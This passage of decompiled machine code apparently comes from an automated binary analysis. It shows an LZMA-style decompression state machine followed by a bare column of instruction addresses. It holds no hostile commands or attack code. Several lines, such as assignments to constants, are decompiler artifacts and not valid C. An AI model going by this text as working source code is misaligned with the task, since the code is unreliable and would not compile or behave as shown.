										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                            0x00000000
                                                                                                            0x0040643a
                                                                                                            0x0040643a
                                                                                                            0x0040643e
                                                                                                            0x00406467
                                                                                                            0x00406471
                                                                                                            0x00406440
                                                                                                            0x00406449
                                                                                                            0x00406456
                                                                                                            0x00406459
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067ee
                                                                                                            0x004067f2
                                                                                                            0x004069a1
                                                                                                            0x004069b7
                                                                                                            0x004069bf
                                                                                                            0x004069c6
                                                                                                            0x004069c8
                                                                                                            0x004069cf
                                                                                                            0x004069d3
                                                                                                            0x004069d3
                                                                                                            0x004067fe
                                                                                                            0x00406805
                                                                                                            0x0040680d
                                                                                                            0x00406810
                                                                                                            0x00406813
                                                                                                            0x00406813
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fbe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x00000000
                                                                                                            0x00405fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fd8
                                                                                                            0x00405fdb
